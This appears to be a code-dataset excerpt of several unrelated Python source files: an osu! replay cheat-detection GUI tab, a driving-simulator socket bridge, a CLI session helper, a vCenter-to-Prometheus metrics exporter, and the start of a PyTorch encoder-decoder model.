+{"seq_id":"323768651","text":"from queue import Queue, Empty\nimport threading\nfrom datetime import datetime\nimport sys\nimport math\nimport time\nfrom functools import partial\nimport logging\n\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom circleguard import *\nfrom slider import Library\nfrom circlevis import BeatmapInfo\n\nfrom widgets import (ReplayMapW, ReplayPathW, MapW, UserW, MapUserW,\n ScrollableLoadablesWidget, ScrollableChecksWidget, StealCheckW, RelaxCheckW,\n CorrectionCheckW, TimewarpCheckW, AnalyzeW)\nfrom settings import SingleLinkableSetting, get_setting\nfrom utils import delete_widget, AnalysisResult\nfrom .visualizer import CGVisualizer\n\n\nlog = logging.getLogger(__name__)\n\nclass MainTab(SingleLinkableSetting, QFrame):\n set_progressbar_signal = pyqtSignal(int) # max progress\n increment_progressbar_signal = pyqtSignal(int) # increment value\n update_label_signal = pyqtSignal(str)\n write_to_terminal_signal = pyqtSignal(str)\n add_result_signal = pyqtSignal(object) # Result\n add_run_to_queue_signal = pyqtSignal(object) # Run object (or a subclass)\n update_run_status_signal = pyqtSignal(int, str) # run_id, status_str\n print_results_signal = pyqtSignal() # called after a run finishes to flush the results queue before printing \"Done\"\n\n LOADABLES_COMBOBOX_REGISTRY = [\"Add a Loadable\", \"+ Map Replay\", \"+ Local Replay\", \"+ Map\", \"+ User\", \"+ All User Replays on Map\"]\n CHECKS_COMBOBOX_REGISTRY = [\"Add a Check\", \"+ Replay Stealing\", \"+ Relax\", \"+ Aim Correction\", \"+ Timewarp\", \"+ Manual Analysis\"]\n\n def __init__(self):\n QFrame.__init__(self)\n SingleLinkableSetting.__init__(self, \"api_key\")\n\n self.library = Library(get_setting(\"cache_dir\"))\n\n self.loadables_combobox = QComboBox(self)\n self.loadables_combobox.setInsertPolicy(QComboBox.NoInsert)\n for loadable in MainTab.LOADABLES_COMBOBOX_REGISTRY:\n self.loadables_combobox.addItem(loadable, loadable)\n self.loadables_combobox.activated.connect(self.add_loadable)\n\n self.checks_combobox = QComboBox(self)\n self.checks_combobox.setInsertPolicy(QComboBox.NoInsert)\n for check in MainTab.CHECKS_COMBOBOX_REGISTRY:\n self.checks_combobox.addItem(check, check)\n self.checks_combobox.activated.connect(self.add_check)\n\n self.loadables_scrollarea = QScrollArea(self)\n self.loadables_scrollarea.setWidget(ScrollableLoadablesWidget())\n self.loadables_scrollarea.setWidgetResizable(True)\n\n self.checks_scrollarea = QScrollArea(self)\n self.checks_scrollarea.setWidget(ScrollableChecksWidget())\n self.checks_scrollarea.setWidgetResizable(True)\n\n self.loadables = [] # for deleting later\n self.checks = [] # for deleting later\n\n self.print_results_signal.connect(self.print_results)\n self.write_to_terminal_signal.connect(self.write)\n\n self.q = Queue()\n self.cg_q = Queue()\n self.helper_thread_running = False\n self.runs = [] # Run objects for canceling runs\n self.run_id = 0\n self.visualizer = None\n\n terminal = QTextEdit(self)\n terminal.setFocusPolicy(Qt.ClickFocus)\n terminal.setReadOnly(True)\n terminal.ensureCursorVisible()\n self.terminal = terminal\n\n self.run_button = QPushButton()\n self.run_button.setText(\"Run\")\n self.run_button.clicked.connect(self.add_circleguard_run)\n # disable button if no api_key is stored\n self.on_setting_changed(\"api_key\", get_setting(\"api_key\"))\n\n layout = QGridLayout()\n layout.addWidget(self.loadables_combobox, 0, 0, 1, 4)\n layout.addWidget(self.checks_combobox, 0, 8, 1, 4)\n layout.addWidget(self.loadables_scrollarea, 1, 0, 4, 8)\n layout.addWidget(self.checks_scrollarea, 1, 8, 4, 8)\n layout.addWidget(self.terminal, 5, 0, 2, 16)\n layout.addWidget(self.run_button, 7, 0, 1, 16)\n\n self.setLayout(layout)\n\n def on_setting_changed(self, setting, text):\n self.run_button.setEnabled(text != \"\")\n\n # am well aware that there's much duplicated code between remove_loadable,\n # remove_check, add_loadable, and add_check. Don't feel like writing\n # more generic functions for them right now.\n def remove_loadable(self, loadable_id):\n # should only ever be one occurence, a comp + index works well enough\n loadables = [l for l in self.loadables if l.loadable_id == loadable_id]\n if not loadables: # sometimes an empty list, I don't know how if you need a loadable to click the delete button...\n return\n loadable = loadables[0]\n self.loadables_scrollarea.widget().layout.removeWidget(loadable)\n delete_widget(loadable)\n self.loadables.remove(loadable)\n # remove deleted loadables from Checks as well\n for check in self.checks:\n check.remove_loadable(loadable_id)\n\n def remove_check(self, check_id):\n # see above method for comments\n checks = [c for c in self.checks if c.check_id == check_id]\n if not checks:\n return\n check = checks[0]\n self.checks_scrollarea.widget().layout.removeWidget(check)\n delete_widget(check)\n self.checks.remove(check)\n\n def add_loadable(self):\n # don't do anything if they selected the default text\n if self.loadables_combobox.currentIndex() == 0:\n return\n button_data = self.loadables_combobox.currentData()\n # go back to default text\n self.loadables_combobox.setCurrentIndex(0)\n if button_data == \"+ Map Replay\":\n w = ReplayMapW()\n if button_data == \"+ Local Replay\":\n w = ReplayPathW()\n if button_data == \"+ Map\":\n w = MapW()\n if button_data == \"+ User\":\n w = UserW()\n if button_data == \"+ All User Replays on Map\":\n w = MapUserW()\n w.remove_loadable_signal.connect(self.remove_loadable)\n self.loadables_scrollarea.widget().layout.addWidget(w)\n self.loadables.append(w)\n\n def add_check(self):\n if self.checks_combobox.currentIndex() == 0:\n return\n button_data = self.checks_combobox.currentData()\n self.checks_combobox.setCurrentIndex(0)\n if button_data == \"+ Replay Stealing\":\n w = StealCheckW()\n if button_data == \"+ Relax\":\n w = RelaxCheckW()\n if button_data == \"+ Aim Correction\":\n w = CorrectionCheckW()\n if button_data == \"+ Timewarp\":\n w = TimewarpCheckW()\n if button_data == \"+ Manual Analysis\":\n w = AnalyzeW()\n w.remove_check_signal.connect(self.remove_check)\n self.checks_scrollarea.widget().layout.addWidget(w)\n self.checks.append(w)\n\n def write(self, message):\n self.terminal.append(str(message).strip())\n self.scroll_to_bottom()\n\n def scroll_to_bottom(self):\n cursor = QTextCursor(self.terminal.document())\n cursor.movePosition(QTextCursor.End)\n self.terminal.setTextCursor(cursor)\n\n def add_circleguard_run(self):\n checks = self.checks\n if not checks:\n return\n for check in checks:\n # all loadable objects in this check\n # (the check only stores the loadable ids, not the objects themselves)\n # TODO\n # this is a ridiculous way to do it, but the alternative would involve serializing\n # the class into a QByteArray and passing it through the QMimeData of the QDrag,\n # then converting it back to a class on the other side, so we'll stick with this for now.\n\n # aka ``isinstance(check, StealCheckW)``\n if check.double_drop_area:\n loadables1 = [l for l in self.loadables if l.loadable_id in check.drop_area1.loadable_ids]\n loadables2 = [l for l in self.loadables if l.loadable_id in check.drop_area2.loadable_ids]\n check.loadables1 = loadables1\n check.loadables2 = loadables2\n else:\n loadables = [l for l in self.loadables if l.loadable_id in check.all_loadable_ids()]\n check.loadables = loadables\n\n # would use any() but it short circuts and doesn't call on all loadables\n all_filled = True\n for check in checks:\n for loadable in check.all_loadables():\n # don't assign to all_filled if all_filled is already False\n all_filled = loadable.check_required_fields() if all_filled else all_filled\n\n if not all_filled:\n # no more feedback necessary like printing to console (probably)\n # because the check_required_fields method already highlights\n # empty QLineEdits in red\n return\n checks = [check for check in checks if check.all_loadables()]\n if not checks:\n # loadables haven't been dragged to any of the checks, just return\n # so we don't have prints to the console for no reason\n return\n\n run = Run(checks, self.run_id, threading.Event())\n self.runs.append(run)\n self.add_run_to_queue_signal.emit(run)\n self.cg_q.put(run)\n self.run_id += 1\n\n # called every 1/4 seconds by timer, but force a recheck to not wait for that delay\n self.check_circleguard_queue()\n\n\n def check_circleguard_queue(self):\n def _check_circleguard_queue(self):\n try:\n while True:\n run = self.cg_q.get_nowait()\n # occurs if run is canceled before being started, it will still stop\n # before actually loading anything but we don't want the labels to flicker\n if run.event.wait(0):\n continue\n thread = threading.Thread(target=self.run_circleguard, args=[run])\n self.helper_thread_running = True\n thread.start()\n # run sequentially to not confuse user with terminal output\n thread.join()\n except Empty:\n self.helper_thread_running = False\n return\n\n # don't launch another thread running cg if one is already running,\n # or else multiple runs will occur at once (defeats the whole purpose\n # of sequential runs)\n if not self.helper_thread_running:\n # have to do a double thread use if we start the threads in\n # the main thread and .join, it will block the gui thread (very bad).\n thread = threading.Thread(target=_check_circleguard_queue, args=[self])\n thread.start()\n\n\n\n def run_circleguard(self, run):\n self.update_label_signal.emit(\"Loading Replays\")\n self.update_run_status_signal.emit(run.run_id, \"Loading Replays\")\n event = run.event\n try:\n core_cache = get_setting(\"cache_dir\") + \"circleguard.db\"\n slider_cache = get_setting(\"cache_dir\")\n should_cache = get_setting(\"caching\")\n cg = Circleguard(get_setting(\"api_key\"), core_cache, slider_dir=slider_cache, cache=should_cache, loader=TrackerLoader)\n def _ratelimited(length):\n message = get_setting(\"message_ratelimited\")\n ts = datetime.now()\n self.write_to_terminal_signal.emit(message.format(s=length, ts=ts))\n self.update_label_signal.emit(\"Ratelimited\")\n self.update_run_status_signal.emit(run.run_id, \"Ratelimited\")\n def _check_event(event):\n \"\"\"\n Checks the given event to see if it is set. If it is, the run has been canceled\n through the queue tab or by the application being quit, and this thread exits\n through sys.exit(0). If the event is not set, returns silently.\n \"\"\"\n if event.wait(0):\n self.update_label_signal.emit(\"Canceled\")\n self.set_progressbar_signal.emit(-1)\n # may seem dirty, but actually relatively clean since it only affects this thread.\n # Any cleanup we may want to do later can occur here as well\n sys.exit(0)\n\n cg.loader.ratelimit_signal.connect(_ratelimited)\n cg.loader.check_stopped_signal.connect(partial(_check_event, event))\n\n # aggreagte loadables from all of the checks so we don't create\n # separate instances per check and double load the (otherwise)\n # identical loadable\n\n # discard duplicate loadableWs\n loadableWs = {loadableW for checkW in run.checks for loadableW in checkW.all_loadables()}\n # mapping of loadableW id to loadable object so each check can\n # replace its loadableWs with the same loadable object and avoid\n # double loading\n loadableW_id_to_loadable = {}\n\n for loadableW in loadableWs:\n loadable = None\n try:\n if isinstance(loadableW, ReplayPathW):\n if loadableW.path_input.path.is_dir():\n loadable = ReplayDir(loadableW.path_input.path)\n else:\n loadable = ReplayPath(loadableW.path_input.path)\n if isinstance(loadableW, ReplayMapW):\n # Mod init errors on empty string, so just assign None\n mods = Mod(loadableW.mods_input.value()) if loadableW.mods_input.value() else None\n loadable = ReplayMap(int(loadableW.map_id_input.value()), int(loadableW.user_id_input.value()), mods=mods)\n if isinstance(loadableW, MapW):\n mods = Mod(loadableW.mods_input.value()) if loadableW.mods_input.value() else None\n # use placeholder text (1-50) if the user inputted span is empty\n span = loadableW.span_input.value() or loadableW.span_input.field.placeholderText()\n if span == \"all\":\n span = \"1-100\"\n loadable = Map(int(loadableW.map_id_input.value()), span=span, mods=mods)\n if isinstance(loadableW, UserW):\n mods = Mod(loadableW.mods_input.value()) if loadableW.mods_input.value() else None\n span=loadableW.span_input.value()\n if span == \"all\":\n span = \"1-100\"\n loadable = User(int(loadableW.user_id_input.value()), span=span, mods=mods)\n if isinstance(loadableW, MapUserW):\n span = loadableW.span_input.value() or loadableW.span_input.field.placeholderText()\n if span == \"all\":\n span = \"1-100\"\n loadable = MapUser(int(loadableW.map_id_input.value()), int(loadableW.user_id_input.value()), span=span)\n loadableW_id_to_loadable[loadableW.loadable_id] = loadable\n except ValueError as e:\n self.write_to_terminal_signal.emit(str(e))\n self.update_label_signal.emit(\"Invalid arguments\")\n self.update_run_status_signal.emit(run.run_id, \"Invalid arguments\")\n self.set_progressbar_signal.emit(-1)\n sys.exit(0)\n\n for checkW in run.checks:\n d = None\n check_type = None\n max_angle = None\n min_distance = None\n if isinstance(checkW, StealCheckW):\n check_type = \"Steal\"\n d = Detect.STEAL\n if isinstance(checkW, RelaxCheckW):\n check_type = \"Relax\"\n d = Detect.RELAX\n if isinstance(checkW, CorrectionCheckW):\n max_angle = get_setting(\"correction_max_angle\")\n min_distance = get_setting(\"correction_min_distance\")\n check_type = \"Aim Correction\"\n d = Detect.CORRECTION\n if isinstance(checkW, TimewarpCheckW):\n check_type = \"Timewarp\"\n d = Detect.TIMEWARP\n if isinstance(checkW, AnalyzeW):\n d = Detect(0) # don't run any detection\n check_type = \"Visualization\"\n # retrieve loadable objects from loadableW ids\n if isinstance(checkW, StealCheckW):\n loadables1 = [loadableW_id_to_loadable[loadableW.loadable_id] for loadableW in checkW.loadables1]\n loadables2 = [loadableW_id_to_loadable[loadableW.loadable_id] for loadableW in checkW.loadables2]\n c = Check(loadables1, cache=None, loadables2=loadables2)\n else:\n loadables = [loadableW_id_to_loadable[loadableW.loadable_id] for loadableW in checkW.loadables]\n c = Check(loadables, cache=None)\n message_loading_info = get_setting(\"message_loading_info\").format(ts=datetime.now(), check_type=check_type)\n self.write_to_terminal_signal.emit(message_loading_info)\n cg.load_info(c)\n replays = c.all_replays()\n # don't show \"loading 2 replays\" if they were already loaded\n # by a previous check, would be misleading\n num_unloaded = 0\n num_total = len(c.all_replays())\n for r in replays:\n if not r.loaded:\n num_unloaded += 1\n if num_unloaded != 0:\n self.set_progressbar_signal.emit(num_unloaded)\n else:\n self.set_progressbar_signal.emit(1)\n num_loaded = num_total - num_unloaded\n message_loading_replays = get_setting(\"message_loading_replays\").format(ts=datetime.now(),\n num_total=num_total, num_previously_loaded=num_loaded, num_unloaded=num_unloaded,\n check_type=check_type)\n self.write_to_terminal_signal.emit(message_loading_replays)\n for replay in replays:\n _check_event(event)\n cg.load(replay)\n self.increment_progressbar_signal.emit(1)\n c.loaded = True\n # change progressbar into an undetermined state (animation with\n # stripes sliding horizontally) to indicate we're processing\n # the data\n self.set_progressbar_signal.emit(0)\n setting = \"message_starting_investigation_analysis\" if isinstance(checkW, AnalyzeW) else \"message_starting_investigation\"\n message_starting_investigation = get_setting(setting).format(ts=datetime.now(),\n num_total=num_total, num_previously_loaded=num_loaded, num_unloaded=num_unloaded,\n check_type=check_type)\n self.write_to_terminal_signal.emit(message_starting_investigation)\n if isinstance(checkW, AnalyzeW):\n map_ids = [r.map_id for r in replays]\n if len(set(map_ids)) != 1:\n self.write_to_terminal_signal.emit(f\"Visualizer expected replays from a single map, but got multiple {set(map_ids)}. Please use a different Visualizer Object for each map\")\n self.update_label_signal.emit(\"Visualizer Error (Multiple maps)\")\n self.update_run_status_signal.emit(run.run_id, \"Visualizer Error (Multiple maps)\")\n self.set_progressbar_signal.emit(-1)\n sys.exit(0)\n self.q.put(AnalysisResult(replays))\n else:\n self.update_label_signal.emit(\"Investigating Replays\")\n self.update_run_status_signal.emit(run.run_id, \"Investigating Replays\")\n for result in cg.run(c.loadables1, d, c.loadables2, max_angle, min_distance):\n _check_event(event)\n self.q.put(result)\n self.print_results_signal.emit() # flush self.q\n\n self.set_progressbar_signal.emit(-1) # empty progressbar\n # 'flush' self.q so there's no more results left and message_finished_investigation\n # won't print before results from that investigation which looks strange.\n # Signal instead of call to be threadsafe and avoid\n # ```\n # QObject::connect: Cannot queue arguments of type 'QTextCursor'\n # (Make sure 'QTextCursor' is registered using qRegisterMetaType().)\n # ```\n # warning\n self.print_results_signal.emit()\n self.write_to_terminal_signal.emit(get_setting(\"message_finished_investigation\").format(ts=datetime.now()))\n # prevents an error when a user closes the application. Because\n # we're running inside a new thread, if we don't do this, cg (and)\n # the library) will get gc'd in another thread. Because library's\n # ``__del__`` closes the sqlite connection, this causes:\n # ```\n # Traceback (most recent call last):\n # File \"/Users/tybug/Desktop/coding/osu/slider/slider/library.py\", line 98, in __del__\n # self.close()\n # File \"/Users/tybug/Desktop/coding/osu/slider/slider/library.py\", line 94, in close\n # self._db.close()\n # sqlite3.ProgrammingError: SQLite objects created in a thread can only be used in that same thread.\n # The object was created in thread id 123145483210752 and this is thread id 4479481280.\n # ```\n cg.library.close()\n\n except NoInfoAvailableException:\n self.write_to_terminal_signal.emit(\"No information found for those arguments. Please check your inputs and make sure the given user/map exists\")\n self.set_progressbar_signal.emit(-1)\n\n except Exception:\n log.exception(\"Error while running circlecore. Please \"\n \"report this to the developers through discord or github.\\n\")\n\n self.update_label_signal.emit(\"Idle\")\n self.update_run_status_signal.emit(run.run_id, \"Finished\")\n\n def print_results(self):\n try:\n while True:\n result = self.q.get_nowait()\n ts = datetime.now() # ts = timestamp\n message = None\n ischeat = False\n if isinstance(result, StealResult):\n if result.similarity < get_setting(\"steal_max_sim\"):\n ischeat = True\n message = get_setting(\"message_steal_found\").format(ts=ts, sim=result.similarity, r=result, replay1=result.replay1, replay2=result.replay2,\n earlier_replay_mods_short_name=result.earlier_replay.mods.short_name(), earlier_replay_mods_long_name=result.earlier_replay.mods.long_name(),\n later_replay_mods_short_name=result.later_replay.mods.short_name(), later_replay_mods_long_name=result.later_replay.mods.long_name())\n elif result.similarity < get_setting(\"steal_max_sim_display\"):\n message = get_setting(\"message_steal_found_display\").format(ts=ts, sim=result.similarity, r=result, replay1=result.replay1,\n earlier_replay_mods_short_name=result.earlier_replay.mods.short_name(), earlier_replay_mods_long_name=result.earlier_replay.mods.long_name(),\n later_replay_mods_short_name=result.later_replay.mods.short_name(), later_replay_mods_long_name=result.later_replay.mods.long_name())\n\n if isinstance(result, RelaxResult):\n if result.ur < get_setting(\"relax_max_ur\"):\n ischeat = True\n message = get_setting(\"message_relax_found\").format(ts=ts, r=result, replay=result.replay, ur=result.ur,\n mods_short_name=result.replay.mods.short_name(), mods_long_name=result.replay.mods.long_name())\n elif result.ur < get_setting(\"relax_max_ur_display\"):\n message = get_setting(\"message_relax_found_display\").format(ts=ts, r=result, replay=result.replay, ur=result.ur,\n mods_short_name=result.replay.mods.short_name(), mods_long_name=result.replay.mods.long_name())\n\n if isinstance(result, CorrectionResult):\n if len(result.snaps) > 0:\n ischeat = True\n snap_message = get_setting(\"message_correction_snaps\")\n snap_text = \"\\n\".join([snap_message.format(time=snap.time, angle=snap.angle, distance=snap.distance) for snap in result.snaps])\n message = get_setting(\"message_correction_found\").format(ts=ts, r=result, replay=result.replay, snaps=snap_text,\n mods_short_name=result.replay.mods.short_name(), mods_long_name=result.replay.mods.long_name())\n\n if isinstance(result, TimewarpResult):\n if result.frametime < get_setting(\"timewarp_max_frametime\"):\n ischeat = True\n message = get_setting(\"message_timewarp_found\").format(ts=ts, r=result, replay=result.replay, frametime=result.frametime,\n mods_short_name=result.replay.mods.short_name(), mods_long_name=result.replay.mods.long_name())\n elif result.frametime < get_setting(\"timewarp_max_frametime_display\"):\n message = get_setting(\"message_timewarp_found_display\").format(ts=ts, r=result, replay=result.replay, frametime=result.frametime,\n mods_short_name=result.replay.mods.short_name(), mods_long_name=result.replay.mods.long_name())\n\n # message is None if the result isn't a cheat and doesn't\n # satisfy its display threshold\n if message:\n self.write(message)\n if isinstance(result, AnalysisResult):\n self.add_result_signal.emit(result)\n else:\n if ischeat:\n QApplication.beep()\n QApplication.alert(self)\n # add to Results Tab so it can be played back on demand\n self.add_result_signal.emit(result)\n\n except Empty:\n pass\n\n def visualize(self, replays, beatmap_id, result):\n # only run one instance at a time\n if self.visualizer is not None:\n self.visualizer.close()\n snaps = []\n if isinstance(result, CorrectionResult):\n snaps = [snap.time for snap in result.snaps]\n beatmap_info = BeatmapInfo(map_id=beatmap_id)\n if not get_setting(\"render_beatmap\"):\n # don't give the visualizer any beatmap info if the user doesn't\n # want it rendered\n beatmap_info = BeatmapInfo()\n self.visualizer = CGVisualizer(beatmap_info, replays, snaps, self.library)\n self.visualizer.show()\n\n\nclass TrackerLoader(Loader, QObject):\n \"\"\"\n A circleguard.Loader subclass that emits a signal when the loader is ratelimited.\n It inherits from QObject to allow us to use qt signals.\n \"\"\"\n ratelimit_signal = pyqtSignal(int) # length of the ratelimit in seconds\n check_stopped_signal = pyqtSignal()\n # how often to emit check_stopped_signal when ratelimited, in seconds\n INTERVAL = 0.250\n\n def __init__(self, key, cacher=None):\n Loader.__init__(self, key, cacher)\n QObject.__init__(self)\n\n def _ratelimit(self, length):\n self.ratelimit_signal.emit(length)\n # how many times to wait for 1/4 second (rng standing for range)\n # we do this loop in order to tell run_circleguard to check if the run\n # was canceled, or the application quit, instead of hanging on a long\n # time.sleep\n rng = math.ceil(length / self.INTERVAL)\n for _ in range(rng):\n time.sleep(self.INTERVAL)\n self.check_stopped_signal.emit()\n\n\nclass Run():\n \"\"\"\n Represents a click of the Run button on the Main tab, which can contain\n multiple Checks, each of which contains a set of Loadables.\n \"\"\"\n def __init__(self, checks, run_id, event):\n self.checks = checks\n self.run_id = run_id\n self.event = event\n","sub_path":"circleguard/gui/main_tab.py","file_name":"main_tab.py","file_ext":"py","file_size_in_byte":28987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"129988650","text":"import base64\nimport json\nimport eventlet.wsgi\nimport numpy as np\nimport socketio\nimport grpc\n\n\nfrom PIL import Image\nfrom flask import Flask\nfrom io import BytesIO\nimport socket\n\nimport helper\n\nSEND_HOST = \"10.0.2.152\"\nSEND_PORT = 9999\n\nRECV_HOST = \"127.0.0.1\"\nRECV_PORT = 9999\n\nsio = socketio.Server()\napp = Flask(__name__)\nprev_image_array = None\n\n\nrecv_sock = socket.socket(socket.AF_INET)\nrecv_sock.bind((RECV_HOST, RECV_PORT))\nrecv_sock.listen(1)\nconnect, address = recv_sock.accept()\nprint(\"Raspberry Pi Connect By {}\".format(address))\n\nsend_sock = socket.socket(socket.AF_INET)\nsend_sock.connect((SEND_HOST, SEND_PORT))\n\n\n\ndef crop(image, top_cropping_percent):\n assert 0 <= top_cropping_percent < 1.0, 'top_cropping_percent should be between zero and one'\n percent = int(np.ceil(image.shape[0] * top_cropping_percent))\n return image[percent:, :, :]\n\n@sio.on('telemetry')\ndef telemetry(sid, data):\n global send_sock\n global recv_sock\n\n # The current steering angle of the car\n steering_angle = data[\"steering_angle\"]\n\n # The current throttle of the car\n throttle = data[\"throttle\"]\n\n # The current speed of the car\n speed = data[\"speed\"]\n\n # The current image from the center camera of the car\n imgString = data[\"image\"]\n image = Image.open(BytesIO(base64.b64decode(imgString)))\n image_array = np.asarray(image)\n\n image_array = helper.crop(image_array, 0.35, 0.1)\n image_array = helper.resize(image_array, new_dim=(64, 64))\n\n transformed_image_array = image_array[None, :, :, :]\n\n # Raspberry Pi\n # length is 16384 \n img_str = base64.b64encode(transformed_image_array)\n send_sock.sendall(img_str)\n data = connect.recv(1024)\n steering_angle = float(data)\n\n # The driving model currently just outputs a constant throttle. Feel free to edit this.\n throttle = 0.3\n\n print('{:.5f}, {:.1f}'.format(steering_angle, throttle))\n\n send_control(steering_angle, throttle)\n\n@sio.on('connect')\ndef connect(sid, environ):\n print(\"connect \", sid)\n send_control(0, 0)\n\ndef send_control(steering_angle, throttle):\n sio.emit(\"steer\", data={\n 'steering_angle': steering_angle.__str__(),\n 'throttle': throttle.__str__()\n }, skip_sid=True)\n\nif __name__ == '__main__':\n app = socketio.Middleware(sio, app)\n eventlet.wsgi.server(eventlet.listen(('', 4567)), app)\n\n","sub_path":"main_bridge.py","file_name":"main_bridge.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"12678705","text":"from os import path\nimport json\n\n# from leanda.api import nodes\n\n\nclass Session():\n path = '{}/.leanda.json'.format(path.expanduser('~'))\n\n token: str\n owner: str\n cwd: str\n user: {}\n\n def __getattribute__(self, name):\n if name in dir(Session):\n return super().__getattribute__(name)\n return self.load().get(name, None)\n\n def __setattr__(self, name, value):\n self.update({name: value})\n return super().__setattr__(name, value)\n\n def save(self, session):\n with open(self.path, 'w') as f:\n json.dump(session, f, indent=4)\n\n def update(self, session_params):\n if path.exists(self.path):\n session = self.load()\n else:\n session = {}\n session.update(session_params)\n self.save(session)\n\n def load(self):\n if path.exists(self.path):\n with open(self.path, 'r') as f:\n return json.load(f)\n else:\n print('The last session not found')\n return {'token': '', 'cwd': '', 'owner': '', }\n\n\nsession = Session()\n","sub_path":"leanda/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"293764173","text":"#!/usr/bin/env python\n\nfrom pyVmomi import vim\nfrom prometheus_client import start_http_server, Summary, Counter, Gauge\nfrom tools import cli\nfrom pyVim.connect import SmartConnect, Disconnect\nimport atexit\nimport ssl\nimport datetime\nfrom yamlconfig import YamlConfig\nimport argparse\n\ndefaults = {\n 'vcenter_ip': 'localhost',\n 'vcenter_user': 'administrator@vsphere.local',\n 'vcenter_password': 'password',\n 'ignore_ssl': True\n }\n\ndef main():\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-c\", \"--config\",\n help=\"Specify config file\", metavar=\"FILE\")\n args, remaining_argv = parser.parse_known_args()\n config = YamlConfig(args.config, defaults)\n\n # Start up the server to expose the prometheus metrics\n start_http_server(8000)\n\n # Connect to the host without SSL signing\n si=None\n context = None\n if config['main']['ignore_ssl'] and \\\n hasattr(ssl, \"_create_unverified_context\"):\n context = ssl._create_unverified_context()\n\n try:\n si = SmartConnect(host=config['main']['host'],\n user=config['main']['user'],\n pwd=config['main']['password'],\n port=int(config['main']['port']),\n sslContext=context)\n atexit.register(Disconnect, si)\n\n except IOError as e:\n pass\n\n if not si:\n raise SystemExit(\"Unable to connect to host with supplied info.\")\n\n content = si.RetrieveContent()\n perfManager = content.perfManager\n\n\n##############################################################################\n # create a list of vim.VirtualMachine objects so that we can query them for statistics\n container = content.rootFolder\n viewType = [vim.VirtualMachine]\n recursive = True\n\n# REQUEST CreateContainerView\n containerView = content.viewManager.CreateContainerView(container,\n viewType,\n recursive)\n\n children = containerView.view\n count_vms=len(children)\n print(\"Count of VMs:\" + str(count_vms))\n print('CreateContainerView: Start: Date now: %s' % datetime.datetime.now())\n\n##############################################################################\n # create a mapping from performance stats to their counterIDs\n # counterInfo: [performance stat => counterId]\n # performance stat example: cpu.usagemhz.LATEST\n # counterId example: 6\n print('Start: Date now: %s' % datetime.datetime.now())\n counterInfo = {}\n counterids=perfManager.QueryPerfCounterByLevel(level=4)\n\n g = {}\n for c in counterids:\n fullName = c.groupInfo.key + \".\" + c.nameInfo.key + \".\" + c.rollupType\n print(fullName + \": \" + str(c.key))\n counterInfo[fullName] = c.key\n\n # define a gauges for the counter ids\n g[fullName.replace('.','_')] = Gauge(fullName.replace('.','_'), fullName.replace('.','_'), ['vmware_name'])\n\n print('QueryPerfCounterByLevel: Date now: %s' % datetime.datetime.now())\n collected=config['main']['vm_metrics']\n counterIDs = [counterInfo[k] for k in collected if k in counterInfo]\n# counterIDs = [m.key for m in counterids]\n\n# REQUEST MetricId\n# metricIDs = [vim.PerformanceManager.MetricId(counterId=c,\n# instance=\"*\")\n# for c in counterIDs]\n# print('MetricId: Start: Date now: %s' % datetime.datetime.now())\n########################################################################################\n # loop over all vmware machines\n for child in children:\n # only consider machines which have an annotation and are powered on\n if child.summary.config.annotation and child.summary.runtime.powerState==\"poweredOn\":\n # split the multi-line annotation into a dict per property (name, project-id, ...)\n lis=child.summary.config.annotation.split('\\n')\n d = dict(s.rsplit(':',1) for s in filter(None, lis))\n\n# REQUEST MetricID\n metricIDs = [vim.PerformanceManager.MetricId(counterId=c,\n instance=\"*\")\n for c in counterIDs]\n print('MetricId: Start: Date now: %s' % datetime.datetime.now())\n\n# print(metricIDs)\n# REQUEST QuerySpec - build query spec for the next metric query\n spec = vim.PerformanceManager.QuerySpec(maxSample=1,\n entity=child,\n metricId=metricIDs,\n intervalId=20)\n\n print('QuerySpec: Start: Date now: %s' % datetime.datetime.now())\n# REQUEST QueryStats - get metrics from vcenter\n result = perfManager.QueryStats(querySpec=[spec])\n print('QueryStats: Start: Date now: %s' % datetime.datetime.now())\n # Loop through the results and print the output\n output = \"\"\n for r in result:\n# if child.summary.config.annotation and child.summary.runtime.powerState==\"poweredOn\":\n # loop over the metrics\n for val in result[0].value:\n if val:\n # print vmware name\n# output += \"id:\" + child.summary.config.name + \",\"\n # print key names\n# output += counterInfo.keys()[counterInfo.values().index(val.id.counterId)]\n # print key values plus metadata\n# output += \": \" + str(val.value[0]) + \", name:\" + d['name'] + \", project_id:\" + d['projectid'] + \"\\n\"\n# output += \"\\n\"\n # try to remove empty lines (maybe does not seem to work)\n# print(filter(None, output))\n# if counterInfo.keys()[counterInfo.values().index(val.id.counterId)] == 'cpu.usage.average':\n # send metrics to prometheus exporter\n g[counterInfo.keys()[counterInfo.values().index(val.id.counterId)].replace('.','_')].labels(d['name']).set(val.value[0])\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"samples/o-test.py","file_name":"o-test.py","file_ext":"py","file_size_in_byte":6116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"117445614","text":"# -*- coding: utf-8 -*-\n\"\"\"\n @File : model.py\n @Time : 2020/7/2 上午10:50\n @Author : yizuotian\n @Description :\n\"\"\"\nimport torch.nn.functional as F\nfrom torch import nn\nfrom torchvision import models\n\n\nclass EncoderDecoder(nn.Module):\n def __init__(self, num_classes, **kwargs):\n super(EncoderDecoder, self).__init__(**kwargs)\n self.num_classes = num_classes\n # 第一层是单通道\n self.conv = nn.Conv2d(1, 64, kernel_size=(3, 3), padding=(1, 1), stride=(1, 1))\n self.bn = nn.BatchNorm2d(64)\n # 使用预训练基模型\n self.cnn = self.feature_extractor()\n # 分类\n self.fc = nn.Linear(512, num_classes)\n\n def forward(self, x):\n \"\"\"\n\n :param x: [B,C,H,W]\n :return:\n \"\"\"\n x = F.relu(self.bn(self.conv(x)), True)\n x = F.max_pool2d(x, kernel_size=(2, 1), stride=(2, 1))\n x = self.cnn(x)\n\n x = x.permute(0, 2, 3, 1) # [B,C,H,W]=>[B,H,W,C]\n x = self.fc(x)\n x = F.softmax(x, dim=-1)\n\n return x\n\n @classmethod\n def feature_extractor(cls):\n return nn.Identity()\n\n\nclass 